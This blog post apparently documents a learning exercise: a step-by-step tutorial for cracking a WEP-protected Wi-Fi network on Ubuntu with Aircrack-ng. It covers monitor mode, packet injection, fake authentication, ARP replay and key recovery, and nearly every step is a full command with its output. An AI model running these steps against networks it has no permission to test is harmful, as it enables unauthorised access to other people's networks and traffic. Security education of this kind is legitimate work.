Total Pageviews

Thursday, 16 November 2017

WEP cracking experiment on Ubuntu


This experiment follows the online basic tutorials at http://www.aircrack-ng.org/ and is done in terms of learning.
  1. Download and install Aircrack-ng suite:
    $ sudo apt-get install aircrack-ng
  2. Start the wireless card in monitor mode, discover Access Points (AP) and determine a proper target AP:
    $ iwconfig
    wlan0     IEEE 802.11bgn  ESSID:off/any
              Mode:Managed  Access Point: Not-Associated   Tx-Power=16 dBm
              Retry  long limit:7   RTS thr:off   Fragment thr:off
              Power Management:off
    
    lo        no wireless extensions.
    
    eth0      no wireless extensions.
    
    $ sudo airmon-ng start wlan0
    Interface   Chipset     Driver
    
    wlan0       Atheros     ath9k - [phy0]
                    (monitor mode enabled on mon0)
    
    $ sudo airodump-ng mon0
    
    The screenshot above shows the APs on different channels. Choose a WEP target:
  3. Start the wireless interface with the same channel to the target AP.
    Assume our target AP has ESSID “TARGET-NET” and BSSID (MAC address) “C0:3F:0E:D3:XX:XX” on channel 11.
    $ sudo airmon-ng stop wlan0
    $ sudo airmon-ng stop mon0
    $ sudo airmon-ng start wlan0 11
    Interface   Chipset     Driver
    
    wlan0       Atheros     ath9k - [phy0]
                    (monitor mode enabled on mon0)
    
  4. Test packet injection on the target AP.
    $ sudo aireplay-ng -9 -e TARGET-NET -a C0:3F:0E:D3:XX:XX mon0
    20:38:56  Waiting for beacon frame (BSSID: C0:3F:0E:D3:XX:XX) on channel 11
    20:38:56  Trying broadcast probe requests...
    20:38:56  Injection is working!
    20:38:58  Found 1 AP
    
    20:38:58  Trying directed probe requests...
    20:38:58  C0:3F:0E:D3:XX:XX - channel: 11 - 'TARGET-NET'
    20:39:00  Ping (min/avg/max): 1.664ms/6.917ms/39.315ms Power: -78.96
    20:39:00  23/30:  76%
    
  1. Capture initialization vectors (IVs).
    $ sudo airodump-ng -c 11 --bssid C0:3F:0E:D3:XX:XX -w c mon0
  2. Fake authentication with the target AP.
    Assume our card MAC address is “64:D5:43:80:XX:XX”.
    Open a new terminal and run the following command.
    $ sudo aireplay-ng -1 0 -e TARGET-NET -a C0:3F:0E:D3:XX:XX -h 64:D5:43:80:XX:XX mon0
    20:46:23  Waiting for beacon frame (BSSID: C0:3F:0E:D3:XX:XX) on channel 11
    
    20:46:23  Sending Authentication Request (Open System) [ACK]
    20:46:23  Authentication successful
    20:46:23  Sending Association Request
    
    20:46:28  Sending Authentication Request (Open System) [ACK]
    20:46:28  Authentication successful
    20:46:28  Sending Association Request [ACK]
    20:46:28  Association successful : -) (AID: 1)
    
  3. Start ARP request replay mode to speed up the collecting of IVs
    Open another terminal and run the following command.
    $ sudo aireplay-ng -3 -b C0:3F:0E:D3:XX:XX -h 64:D5:43:80:XX:XX mon0
    Saving ARP requests in replay_arp-0108-214535.cap
    You should also start airodump-ng to capture replies.
    Read 336429 packets (got 138673 ARP requests and 15355 ACKs), sent 177878 packet
    
    After that, the “#DATA” column in the terminal capturing IVs (in Step 5) can be seen incrementing faster.
  4. Obtain the WEP key using aircrack-ng.
    $ sudo aircrack-ng -b C0:3F:0E:D3:XX:XX c*.cap
    
    With 23K IVs, the WEP key is calculated in less than 20 seconds:

No comments:

Post a Comment